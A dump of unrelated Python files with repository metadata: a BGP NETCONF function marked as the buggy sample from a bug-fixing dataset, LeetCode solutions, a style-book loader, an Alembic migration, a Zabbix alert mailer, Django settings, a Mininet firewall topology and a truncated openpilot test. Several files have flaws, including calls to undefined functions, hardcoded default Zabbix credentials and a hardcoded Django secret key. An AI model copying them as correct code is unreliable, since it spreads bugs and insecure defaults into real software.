b9e12fcfc6617d10fd565872dc8e1f110eeda0c9 | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-4/3a3c6d0f9a04487b037a1650614a3ee8ee4f3333-<delete_bgp_enable_other>-bug.py | b2fc202f8d6ad8f8f0834a1cf56ec6ee2eb7ce9a | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,218 | py | def delete_bgp_enable_other(self, **kwargs):
' delete bgp enable other args '
module = kwargs['module']
conf_str = CE_MERGE_BGP_ENABLE_HEADER
cmds = []
graceful_restart = module.params['graceful_restart']
if (graceful_restart != 'no_use'):
conf_str += ('<gracefulRestart>%s</gracefulRestart>' % graceful_restart)
if (graceful_restart == 'true'):
cmd = 'graceful-restart'
else:
cmd = 'undo graceful-restart'
cmds.append(cmd)
time_wait_for_rib = module.params['time_wait_for_rib']
if time_wait_for_rib:
conf_str += '<timeWaitForRib>600</timeWaitForRib>'
cmd = 'undo graceful-restart timer wait-for-rib'
cmds.append(cmd)
as_path_limit = module.params['as_path_limit']
if as_path_limit:
conf_str += '<asPathLimit>255</asPathLimit>'
cmd = 'undo as-path-limit'
cmds.append(cmd)
check_first_as = module.params['check_first_as']
if (check_first_as != 'no_use'):
conf_str += ('<checkFirstAs>%s</checkFirstAs>' % check_first_as)
if (check_first_as == 'true'):
cmd = 'check-first-as'
else:
cmd = 'undo check-first-as'
cmds.append(cmd)
confed_id_number = module.params['confed_id_number']
if confed_id_number:
conf_str += '<confedIdNumber></confedIdNumber>'
cmd = 'undo confederation id'
cmds.append(cmd)
confed_nonstanded = module.params['confed_nonstanded']
if (confed_nonstanded != 'no_use'):
conf_str += ('<confedNonstanded>%s</confedNonstanded>' % confed_nonstanded)
if (confed_nonstanded == 'true'):
cmd = 'confederation nonstandard'
else:
cmd = 'undo confederation nonstandard'
cmds.append(cmd)
bgp_rid_auto_sel = module.params['bgp_rid_auto_sel']
if (bgp_rid_auto_sel != 'no_use'):
conf_str += ('<bgpRidAutoSel>%s</bgpRidAutoSel>' % bgp_rid_auto_sel)
if (bgp_rid_auto_sel == 'true'):
cmd = 'router-id vpn-instance auto-select'
else:
cmd = 'undo router-id'
cmds.append(cmd)
keep_all_routes = module.params['keep_all_routes']
if (keep_all_routes != 'no_use'):
conf_str += ('<keepAllRoutes>%s</keepAllRoutes>' % keep_all_routes)
if (keep_all_routes == 'true'):
cmd = 'keep-all-routes'
else:
cmd = 'undo keep-all-routes'
cmds.append(cmd)
memory_limit = module.params['memory_limit']
if (memory_limit != 'no_use'):
conf_str += ('<memoryLimit>%s</memoryLimit>' % memory_limit)
if (memory_limit == 'true'):
cmd = 'prefix memory-limit'
else:
cmd = 'undo prefix memory-limit'
cmds.append(cmd)
gr_peer_reset = module.params['gr_peer_reset']
if (gr_peer_reset != 'no_use'):
conf_str += ('<grPeerReset>%s</grPeerReset>' % gr_peer_reset)
if (gr_peer_reset == 'true'):
cmd = 'graceful-restart peer-reset'
else:
cmd = 'undo graceful-restart peer-reset'
cmds.append(cmd)
is_shutdown = module.params['is_shutdown']
if (is_shutdown != 'no_use'):
conf_str += ('<isShutdown>%s</isShutdown>' % is_shutdown)
if (is_shutdown == 'true'):
cmd = 'shutdown'
else:
cmd = 'undo shutdown'
cmds.append(cmd)
suppress_interval = module.params['suppress_interval']
hold_interval = module.params['hold_interval']
clear_interval = module.params['clear_interval']
if suppress_interval:
conf_str += '<suppressInterval>60</suppressInterval>'
cmd = ('nexthop recursive-lookup restrain suppress-interval %s hold-interval %s clear-interval %s' % (suppress_interval, hold_interval, clear_interval))
cmds.append(cmd)
if hold_interval:
conf_str += '<holdInterval>120</holdInterval>'
if clear_interval:
conf_str += '<clearInterval>600</clearInterval>'
conf_str += CE_MERGE_BGP_ENABLE_TAIL
recv_xml = self.netconf_set_config(module=module, conf_str=conf_str)
if ('<ok/>' not in recv_xml):
module.fail_json(msg='Error: Delete bgp enable failed.')
return cmds | [
"dg1732004@smail.nju.edu.cn"
] | dg1732004@smail.nju.edu.cn |
f74b0d79e2bf2d6c54a8a643b589882dd4d66d2b | 69b93223fc6794123269022a02e5a1dcf130e698 | /33_Search_in_Rotated_Sorted_Array.py | a01f3848cc0f6ca429274d4d6cc6745238e32674 | [] | no_license | GuangyuZheng/leet_code_python | 43b984ce98cc889a7e07151004d347cb03b2d9b2 | 266def94df8245f90ea5b6885fc472470b189e51 | refs/heads/master | 2020-09-05T18:12:07.649374 | 2020-02-22T09:37:59 | 2020-02-22T09:37:59 | 220,177,486 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,504 | py | from typing import List
class Solution:
def search(self, nums: List[int], target: int) -> int:
# find pivot
if len(nums) == 0:
return -1
if nums[0] <= nums[len(nums) - 1]:
pivot = 0
else:
left = 0
right = len(nums) - 1
while left <= right:
mid = (left + right) // 2
if nums[mid] > nums[mid + 1]:
break
else:
if nums[mid] >= nums[left]:
left = mid + 1
else:
right = mid - 1
pivot = (left + right) // 2 + 1
vleft, vright = 0, len(nums) - 1
while vleft <= vright:
vmid = (vleft + vright) // 2
tmid = (vmid + pivot) % len(nums)
if nums[tmid] == target:
return tmid
elif nums[tmid] < target:
vleft = vmid+1
else:
vright = vmid-1
return -1
# Treat the rotated array as two sorted array
class SolutionV2:
def search(self, nums: List[int], target: int) -> int:
n = len(nums)
lo, hi = 0, n - 1
while lo <= hi:
mid = (lo + hi) // 2
if (target >= nums[0]) == (nums[mid] >= nums[0]):
num = nums[mid]
else:
if target < nums[0]:
num = -10e10
else:
num = 10e10
if num > target:
hi = mid - 1
elif num < target:
lo = mid + 1
else:
return mid
return -1
# If we split the rotated array, at least there exists one sorted array
# [4 5 6 7 1 2 3] split at 7 -> [4 5 6 7] [7 1 2 3]
# If target in the sorted array, then discard the the rest part, vise versa
class SolutionV3:
def search(self, nums: List[int], target: int) -> int:
n = len(nums)
start, end = 0, n-1
while start <= end:
mid = (start + end) // 2
if nums[mid] == target:
return mid
if nums[start] <= nums[mid]:
if nums[start] <= target < nums[mid]:
end = mid - 1
else:
start = mid + 1
else:
if nums[mid] < target <= nums[end]:
start = mid + 1
else:
end = mid - 1
return -1
| [
"583621555@qq.com"
] | 583621555@qq.com |
d2cf5b52e5287415b08b947c096c0b6e4e4c85de | 204454f01c125c4364615f2a6ee80d9a781b2524 | /pyliter/style_book.py | 2b0b92a504be4dd7b2e65440181fd6a660ae6e18 | [
"Apache-2.0"
] | permissive | JnyJny/pyliter | d18e49f607fbd835f8b3b273c8bf1ae7fa57876f | e2e5f170b21c26bed4c3c0b3a83c8fabbc89430f | refs/heads/master | 2021-07-12T02:48:42.440944 | 2021-07-07T16:25:29 | 2021-07-07T16:25:29 | 227,500,321 | 11 | 0 | Apache-2.0 | 2020-01-27T20:13:00 | 2019-12-12T02:10:34 | Python | UTF-8 | Python | false | false | 3,656 | py | """style container
"""
import importlib.resources
import yaml
from pathlib import Path
from webcolors import name_to_rgb, hex_to_rgb
from . import resources
class StyleBook(dict):
""""""
@classmethod
def available_styles(cls) -> list:
"""Return a list of available style books by name."""
styles = []
for filename in importlib.resources.contents(resources):
path = Path(filename)
if path.match("*_style.yaml"):
styles.append(path.stem.replace("_style", ""))
styles.sort()
return styles
@classmethod
def from_any(cls, stylespec: str):
"""Returns a configured StyleBook. First it attempts to load
a StyleBook from stylespec interpreted as a filesystem path.
If no file is found, the method next tries to load a StyleBook
using stylespec is a style name (see `available_styles`).
If both of those fail, ValueError is raised.
:param str stylespec: path or style name
"""
try:
return cls.from_filename(stylespec)
except FileNotFoundError:
pass
try:
return cls.by_name(stylespec)
except FileNotFoundError:
pass
raise ValueError(f"unable to find a style matching '{stylespec}'")
@classmethod
def by_name(cls, style_name: str):
"""Return a StyleBook initialized with the contents of the
resource file identified by 'style_name'.
:param str style_name:
"""
with importlib.resources.path(resources, f"{style_name}_style.yaml") as path:
return cls.from_filename(path)
@classmethod
def from_filename(cls, filename: str):
"""Return a StyleBook initializes with the contents of the given filename.
:param str filename:
"""
path = Path(filename)
return cls(yaml.safe_load(path.read_text()))
@classmethod
def template(cls) -> dict:
pass
def __init__(self, styles: dict, name: str = None):
"""
:param dict styles: dictionary of dictionaries
"""
self.name = name
self.update(styles)
self.validate()
def validate(self) -> bool:
""""""
if "DEFAULT" not in self:
raise ValueError("Missing DEFAULT style.")
for category, attributes in self.items():
for color_key in ["color", "background_color", "underline"]:
try:
color_spec = attributes[color_key]
try:
color = hex_to_rgb(color_spec)
except ValueError:
color = name_to_rgb(color_spec)
attributes[color_key] = (color.red, color.blue, color.green, 255)
except KeyError:
pass
except ValueError as error:
raise error from None
return True
def get(self, key: str) -> dict:
"""Returns a dictionary for the given key."""
return super().get(key, {})
def __str__(self):
"""YAML formatted string."""
return yaml.safe_dump(dict(self), sort_keys=False)
def save(self, path):
"""Save the contents of this StyleBook to path in YAML format."""
yaml.safe_dump(dict(self), open(path, "w"), sort_keys=False)
@property
def default(self):
"""Returns the DEFAULT style category dictionary."""
return self.get("DEFAULT")
@property
def categories(self):
"""List of style category names."""
return list(self.keys())
| [
"erik.oshaughnessy@gmail.com"
] | erik.oshaughnessy@gmail.com |
4a3aa025bd2897ef867e95629f701e734f714181 | 3a67c039c6c70d7317bb695212566011ce8f5c5f | /migrations/versions/ee6b7b2e6a16_.py | a162ffc2bda764d510c69f3407cc583388346309 | [] | no_license | joonaojapalo/trackem | 3f7a0376f2e0059aca9c45f1bc4a812252028e9a | 8ae80f1b1045195f4ae9a31cf9c802b4eda6e684 | refs/heads/master | 2020-05-05T12:05:43.447284 | 2019-04-07T19:41:57 | 2019-04-07T19:41:57 | 180,013,875 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 863 | py | """empty message
Revision ID: ee6b7b2e6a16
Revises: 28f62b6e1f24
Create Date: 2016-03-01 11:46:58.147000
"""
# revision identifiers, used by Alembic.
revision = 'ee6b7b2e6a16'
down_revision = '28f62b6e1f24'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects.postgresql import ENUM
# enum type
user_status_enum = sa.Enum('new', 'confirmed', 'deleted', name="status_enum")
def upgrade():
# create new type
user_status_enum.create(op.get_bind())
### commands auto generated by Alembic - please adjust! ###
op.add_column('user', sa.Column('status', user_status_enum, nullable=False))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('user', 'status')
### end Alembic commands ###
# drop type
user_status_enum.drop(op.get_bind())
| [
"joona_ojapalo@hotmail.com"
] | joona_ojapalo@hotmail.com |
b45cb7f4d47b76c54fca5a37745168c87224cc22 | 2a9f992afa89b3afbc8e838acebba662833da409 | /Assignment 1/a1test.py | 4ac250f72df09e8e2c5d1825188475f03e9e73cc | [] | no_license | simrit1/cs1110_python | 67fe5fc79d28c3dbdc5990be960153225a144d50 | d39f52eddc4eb60153f738761fc2210e72f60326 | refs/heads/master | 2022-09-05T05:44:23.431343 | 2020-05-26T04:33:29 | 2020-05-26T04:33:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 446 | py | # Test a1
# Caitlin Stanton (cs968), Andrew Denkewicz(ajd248)
# 09/10/2016
"""Unit test for module a1
When run as a script, this module invokes several procedures that
test the various functions in the module a1."""
import cornelltest
import a1
def testA():
s="125 dollars"
assert_equals("125", before_space(s))
def testB():
pass
def testC():
pass
def testD():
pass
testA()
testB()
testC()
testD()
print "Module a1 passed all tests" | [
"caitlinstanton44@gmail.com"
] | caitlinstanton44@gmail.com |
cabbd058d2288ed0cdd37e5cf0eaacab14b38ae4 | 92500c3acff59c68d5d30f47ec86d73c6fc5b69a | /zabbix_api/zabbix_report.py | 54ec3d3addac13b4f56dcb35cb4d7724739ad2f2 | [] | no_license | Fangzhongpeng/zabbix_api | 68b4ee46aab75ea6de1c6b338a9e8dfd2b00239c | 990ea43c4c1bccd044daae11da8c36864f9cc489 | refs/heads/master | 2023-06-25T01:23:02.145174 | 2023-06-08T03:30:43 | 2023-06-08T03:30:43 | 299,521,967 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,195 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import json
import urllib2
from urllib2 import URLError
import sys
import zabbix_sendmail
import sys
import datetime
reload(sys)
sys.setdefaultencoding('utf8')
# 接收人
mailtolist = ['fangzhongpeng9@163.com','fangzhongpeng@iqingka.com' ]
# 格式:zabbix地址,zabbix帐号,zabbix密码,邮件标题
zabbix_addresses = ['http://zabbix.qkvoice.com,Admin,zabbix,今日告警统计']
now_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
class ZabbixTools:
def __init__(self, address, username, password):
self.address = address
self.username = username
self.password = password
self.url = '%s/api_jsonrpc.php' % self.address
self.header = {"Content-Type": "application/json"} #声明消息体的字段类型
def user_login(self):
data = json.dumps({
"jsonrpc": "2.0",
"method": "user.login",
"params": {
"user": self.username,
"password": self.password
},
"id": 0
})
request = urllib2.Request(self.url, data)
for key in self.header:
request.add_header(key, self.header[key])
try:
result = urllib2.urlopen(request)
except URLError as e:
print "Auth Failed, please Check your name and password:", e.code
else:
response = json.loads(result.read())
result.close()
# print response['result']
self.authID = response['result']
return self.authID
def trigger_get(self):
data = json.dumps({
"jsonrpc": "2.0",
"method": "trigger.get",
"params": {
"output": [
"triggerid",
"description",
"priority"
],
"filter": {
"value": 1
},
"expandData": "hostname",
"sortfield": "priority",
"sortorder": "DESC",
"expandDescription":1, #expandDescription参数,将trigger的description字段中的宏变量使用实际的数值进行替代;
"selectHosts": ['host'], #在hosts属性中返回触发器所属的主机.
# "selectGroups": ['name'], #在groups属性中返回触发器所属的主机组.
# "skipDependent": 1,
"active": 1, # 只返回所属被监控主机的启用状态的触发器的触发器信息
"monitored": 1, #只返回所属被监控主机的启用状态的触发器,并且监控项在启用状态的触发器信息.
#"only_true": 1, #只返回最近处于问题状态的触发器.
#"min_severity": 1 #只返回严重级别大于或等于给定严重性的触发器.
},
"auth": self.user_login(),
"id": 1
})
request = urllib2.Request(self.url, data)
for key in self.header:
request.add_header(key, self.header[key])
try:
result = urllib2.urlopen(request)
except URLError as e:
print "Error as ", e
else:
response = json.loads(result.read())
result.close()
issues = response['result']
content = ''
hostips = []
alerts = []
if issues:
for line in issues:
#content = content + "%s:%s\r\n" % (line['hosts'], line['description'])
#content = content + "%s : %s\r\n" % (line['hosts'][0]['host'], line['description'])
#vhosts = vhosts + ","+ "%s" % line['hosts'][0]['host']
hostips.append(line['hosts'][0]['host'])
#alerts = alerts + "%s" % line['description']
alerts.append(line['description'])
#return (vhosts,alerts)
#print type(content)
return (hostips,alerts)
def get_html_msg(self):
#issue = z.trigger_get()
hostips,alerts = z.trigger_get()
head ="""<head>
<title>磁盘使用情况</title>
<style type="text/css">
.tftable {font-size:12px;color:#333333;width:100%;border-width: 1px;border-color: #9dcc7a;border-collapse: collapse;}
.tftable th {font-size:12px;background-color:#abd28e;border-width: 1px;padding: 8px;border-style: solid;border-color: #9dcc7a;text-align:left;}
.tftable tr {background-color:#ffffff;}
.tftable td {font-size:12px;border-width: 1px;padding: 8px;border-style: solid;border-color: #9dcc7a;}
.tftable tr:hover {background-color:#ffff99;}
</style>
</head>"""
p = """<p><font face="宋体" size="3"><b>截止到 """ + now_time + """ 主机当前告警信息如下:</b></font></p>"""
table = ''
#htmlmodel = 'aaa'
#table = """<tr><td>/</td><td>"""+ "ceshi" +"""</td><td>16G</td><td>54%</td></tr>"""
for ip,alert in zip(hostips,alerts):
#for alert in alerts:
table = table+ """<tr><td>"""+ ip + """</td><td>"""+ alert +"""</td><td>16G</td><td>54%</td></tr>"""
# print alert
body = p + """
<table class="tftable" border="1">
<tr><th>主机<th>告警<th>可用</th><th>使用率</th></tr> """ + table + """
</table>
</br>"""
htmlmodel = """<html>""" + head + body + """</html>"""
#print("test:\n", list(zip(hostip, alert)))
#print ip,alert
return htmlmodel
if __name__ == "__main__":
for zabbix_addres in zabbix_addresses:
address, username, password, subject = zabbix_addres.split(',')
z = ZabbixTools(address=address, username=username, password=password)
#AuthID = z.user_login()
#print AuthID
#content = z.trigger_get()
content = z.get_html_msg()
#z.get_html_msg()
#print(z.get_html_msg())
zabbix_sendmail.send_mail(mailtolist, subject, content)
print "Done!"
| [
"word2613182"
] | word2613182 |
a87cf0bc64e224cf6d7d8dda11b39a858f0c6e54 | 0366bccae8841bbf6ecaad70660aae89bb0f6394 | /36_Custom_Modules_4/main.py | 0933dd8cf05ff7f965edf197604b58d88ec52085 | [] | no_license | KobiShashs/Python | 8a5bdddcaef84b455795c5393cbacee5967493f7 | e748973ad0b3e12c5fb87648783531783282832a | refs/heads/master | 2021-04-05T20:18:57.715805 | 2020-04-02T21:51:44 | 2020-04-02T21:51:44 | 248,597,057 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 185 | py | from file1 import GreetingCard
from file2 import BirthdayCard
card1 = GreetingCard("Kobi","Luther")
card1.greeting_msg()
card2 = BirthdayCard("Kobi","Luther",32)
card2.greeting_msg() | [
"kobi.shasha@gmail.com"
] | kobi.shasha@gmail.com |
080dd226f6ad8c2b5c5bbe796a14e817b05abc0d | 89b2b89d224066b5cd69cfbc38653aff5d6cccdd | /poke_api/poke_api/settings.py | a587be7cd2523af38fc6de621676564f21563b9b | [] | no_license | BashayerNouri/Poke-API | 9e575e90d6af857038dd7fb3854c5549f316af88 | 3f30705a8beef22d7843f65c186b438f0df52ab0 | refs/heads/master | 2022-12-10T14:36:22.129351 | 2019-09-02T06:33:07 | 2019-09-02T06:33:07 | 205,728,570 | 0 | 0 | null | 2022-12-08T06:06:30 | 2019-09-01T20:26:41 | Python | UTF-8 | Python | false | false | 3,154 | py | """
Django settings for poke_api project.
Generated by 'django-admin startproject' using Django 2.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'c$@%-qkfinj7kjyn9dyf3*$nj078te-5vv^a-=ji&@x1z862t!'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'app'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'poke_api.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'poke_api.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
| [
"bashayer_nouri@hotmail.com"
] | bashayer_nouri@hotmail.com |
c06a081f81eecfc07a2cb414e768125e7fd4ef48 | 8bcb2fe177067a506cb841f110a837a2607eb9ef | /lox/ast_printer.py | 6f818e0314db3a1edd4a274c2c382fe25b2aaeec | [] | no_license | faheywf/pylox | efd7c0979bcea8b062476d9255a60d80781821f3 | 2db7fc4fdeeac4f3cd7d075b04c8b485e865d189 | refs/heads/main | 2023-07-19T04:19:53.598152 | 2021-09-04T23:02:45 | 2021-09-04T23:02:45 | 398,118,193 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,112 | py | from stmt import Block, Expression, Function, If, Print, Return, Stmt, StmtVisitor, Var, While
from typing import List
import attr
from expr import Assign, Binary, Call, Expr, Grouping, Literal, Unary, ExprVisitor, Variable
from token_type import TokenType
from tokens import Token
@attr.s(auto_attribs=True)
class AstPrinter(ExprVisitor[str], StmtVisitor[None]):
def print_statements(self, statements: List[Stmt]):
for statement in statements:
self.print_statement(statement)
def print_statement(self, statement: Stmt):
statement.accept(self)
def print_expr(self, expr: Expr)-> str:
return expr.accept(self)
def parenthesize(self, name: str, *exprs: List[Expr])-> str:
s = f"({name}"
for expr in exprs:
s += " "
s += expr.accept(self)
s += ")"
return s
def visit_block_stmt(self, stmt: Block):
print("(block:")
for stmt in stmt.statements:
self.print_statement(stmt)
print(")")
def visit_expression_stmt(self, stmt: Expression):
print(self.print_expr(stmt.expression))
def visit_function_stmt(self, stmt: Function):
print(f"(fn {stmt.name.lexeme}({', '.join([param.lexeme for param in stmt.params])})")
self.print_statements(stmt.body)
print(")")
def visit_if_stmt(self, stmt: If):
print("(if then")
self.print_statement(stmt.then_branch)
if stmt.else_branch is not None:
print("else")
self.print_statement(stmt.else_branch)
def visit_print_stmt(self, stmt: Print):
print(self.parenthesize("print", stmt.expression))
def visit_return_stmt(self, stmt: Return):
print(self.parenthesize("return", stmt.value))
def visit_var_stmt(self, stmt: Var):
if stmt.initializer is not None:
print(self.parenthesize(f"var: {stmt.name.lexeme} = ", stmt.initializer))
else:
print(f"(var: {stmt.name.lexeme} = nil)")
def visit_while_stmt(self, stmt: While):
print("(while:")
print(f"\tcondition: {self.print_expr(stmt.condition)}")
self.print_statement(stmt.body)
print(")")
def visit_assign_expr(self, expr: Assign) -> str:
print(f"(assign {expr.name.lexeme} = {self.print_expr(expr.value)})")
def visit_binary_expr(self, expr: Binary) -> str:
return self.parenthesize(expr.operator.lexeme, expr.left, expr.right)
def visit_call_expr(self, expr: Call) -> str:
return self.parenthesize("call", expr.callee, *expr.arguments)
def visit_grouping_expr(self, expr: Grouping) -> str:
return self.parenthesize("group", expr.expression)
def visit_literal_expr(self, expr: Literal) -> str:
if expr.value is None:
return "nil"
return str(expr.value)
def visit_unary_expr(self, expr: Unary) -> str:
return self.parenthesize(expr.operator.lexeme, expr.right)
def visit_variable_expr(self, expr: Variable) -> str:
return expr.name.lexeme
| [
"billy.fahey@gmail.com"
] | billy.fahey@gmail.com |
76b6672f2d8c535fc1f83b0fa31a696341394d51 | 8ad4b4cc8350bf06a7a7678a9fd84b3d00343477 | /mininet/network.py | c95564c01da41bc4640c9e7a11e51fc6231353cd | [] | no_license | jwchae8/SimpleFirewall | 23b333f86d887215a3ddd7d6c6b3f2010c5d8669 | 28942435bb1d7a0c90ecef780366c142a8711cde | refs/heads/master | 2021-01-09T20:11:41.909429 | 2016-06-02T08:18:58 | 2016-06-02T08:18:58 | 60,243,307 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,259 | py | #!/usr/bin/python
from mininet.net import Mininet
from mininet.node import Controller, RemoteController
from mininet.log import setLogLevel, info
from mininet.cli import CLI
from mininet.topo import Topo
from mininet.util import quietRun
from mininet.moduledeps import pathCheck
from sys import exit
import os.path
from subprocess import Popen, STDOUT, PIPE
IPBASE = '10.3.0.0/16'
ROOTIP = '10.3.0.100/16'
IPCONFIG = './IP_CONFIG'
IP_SETTING={}
class simpleTopo(Topo):
"Simple topology for running firewall"
def __init__(self, *args, **kwargs):
Topo.__init__(self, *args, **kwargs)
host1 = self.addHost('host1')
host2 = self.addHost('host2')
host3 = self.addHost('host3')
firewall = self.addSwitch('sw0')
for h in host1, host2, host3:
self.addLink(h, firewall)
class simpleController(Controller):
"Simple controller for running firewall"
def __init__(self, name, inNamespace=False, command='controller', cargs='-v ptcp:%d',
cdir=None, ip="127.0.0.1", port=7878, **params):
Controller.__init__(self, name, ip=ip, port=port, **params)
def start(self):
pathCheck(self.command)
cout = '/tmp/' + self.name + '.log'
if self.cdir is not None:
self.cmd('cd' + self.cdir)
self.cmd(self.command, self.cargs % self.port, '>&', cout, '&')
def stop(self):
self.cmd('kill %' + self.command)
self.terminate()
def set_default_route(host):
info('*** setting default gateway of host %s\n' % host.name)
if(host.name == 'host1'):
routerip = IP_SETTING['sw0-eth1']
elif(host.name == 'host2'):
routerip = IP_SETTING['sw0-eth2']
elif(host.name == 'host3'):
routerip = IP_SETTING['sw0-eth3']
print host.name, routerip
host.cmd('route add %s/32 dev %s-eth0' % (routerip, host.name))
host.cmd('route add default gw %s dev %s-eth0' % (routerip, host.name))
ips = IP_SETTING[host.name].split(".")
host.cmd('route del -net %s.0.0.0/8 dev %s-eth0' % (ips[0], host.name))
def get_ip_setting():
try:
with open(IPCONFIG, 'r') as f:
for line in f:
if( len(line.split()) == 0):
break
name, ip = line.split()
print name, ip
IP_SETTING[name] = ip
info( '*** Successfully loaded ip settings for hosts\n %s\n' % IP_SETTING)
except EnvironmentError:
exit("Couldn't load config file for ip addresses, check whether %s exists" % IPCONFIG_FILE)
def simplenet():
get_ip_setting()
topo = simpleTopo()
info( '*** Creating network\n' )
net = Mininet( topo=topo, controller=RemoteController, ipBase=IPBASE )
net.start()
host1, host2, host3, firewall = net.get( 'host1', 'host2', 'host3', 'sw0')
h1intf = host1.defaultIntf()
h1intf.setIP('%s/8' % IP_SETTING['host1'])
h2intf = host2.defaultIntf()
h2intf.setIP('%s/8' % IP_SETTING['host2'])
h3intf = host3.defaultIntf()
h3intf.setIP('%s/8' % IP_SETTING['host3'])
for host in host1, host2, host3:
set_default_route(host)
CLI( net )
net.stop()
if __name__ == '__main__':
setLogLevel( 'info' )
ee323net()
| [
"jwchae8@gmail.com"
] | jwchae8@gmail.com |
542aea55b7afd47bdb2ee32372b63431f97c8ebd | 9b54e3d58447e917a238b85891020c392c4ac601 | /acmicpc/2667/2667-dfs.py | 7569bf3af48efbd51118eef2cec76fb0ad56d8d9 | [
"MIT"
] | permissive | love-adela/algorithm-ps | ea0ebcd641a4c309348b389b8618daa83973f4b2 | c92d105d8ad344def001160367115ecf99d81c0d | refs/heads/master | 2023-05-11T03:37:11.750692 | 2023-04-30T17:31:30 | 2023-04-30T17:31:30 | 174,651,672 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 642 | py | import sys
read = lambda: sys.stdin.readline().strip()
def dfs(matrix, x, y, count):
matrix[x][y] = 0
dx = [1, -1, 0, 0]
dy = [0, 0, 1, -1]
for i in range(4):
n_x = x + dx[i]
n_y = y + dy[i]
if n_x >=0 and n_x < n and n_y >= 0 and n_y<n:
if matrix[n_x][n_y] == 1:
count = dfs(matrix, n_x, n_y, count+1)
return count
n = int(read())
matrix = [list(map(int, list(read()))) for _ in range(n)]
ans = []
for i in range(n):
for j in range(n):
if matrix[i][j] == 1:
ans.append(dfs(matrix, i, j, 1))
print(len(ans))
for i in sorted(ans):
print(i)
| [
"love.adelar@gmail.com"
] | love.adelar@gmail.com |
36c6a66118d1c67951248699e65272be8aed77c5 | ddb3656fbacef606ac3cfa53eb74a99be90202cd | /selfdrive/manager/test/test_manager.py | d16a145031df086ac7a79be39e1103c2b3f66f40 | [
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] | permissive | ErichMoraga/openpilot | f70b353099d3643c9f8d16fb8003811418c95656 | 2f73be29651e34e62eaf18472f9219cea57c177a | refs/heads/812 | 2023-08-02T16:58:57.870050 | 2023-07-20T17:33:41 | 2023-07-20T17:33:41 | 140,953,335 | 58 | 77 | MIT | 2023-07-30T15:33:18 | 2018-07-14T14:41:16 | C | UTF-8 | Python | false | false | 2,019 | py | #!/usr/bin/env python3
import os
import signal
import time
import unittest
import selfdrive.manager.manager as manager
from selfdrive.hardware import EON, TICI, HARDWARE
from selfdrive.manager.process import DaemonProcess
from selfdrive.manager.process_config import managed_processes
os.environ['FAKEUPLOAD'] = "1"
# TODO: make eon fast
MAX_STARTUP_TIME = 30 if EON else 15
ALL_PROCESSES = [p.name for p in managed_processes.values() if (type(p) is not DaemonProcess) and p.enabled and (p.name not in ['updated', 'pandad'])]
class TestManager(unittest.TestCase):
def setUp(self):
os.environ['PASSIVE'] = '0'
HARDWARE.set_power_save(False)
def tearDown(self):
manager.manager_cleanup()
def test_manager_prepare(self):
os.environ['PREPAREONLY'] = '1'
manager.main()
def test_startup_time(self):
for _ in range(10):
start = time.monotonic()
os.environ['PREPAREONLY'] = '1'
manager.main()
t = time.monotonic() - start
assert t < MAX_STARTUP_TIME, f"startup took {t}s, expected <{MAX_STARTUP_TIME}s"
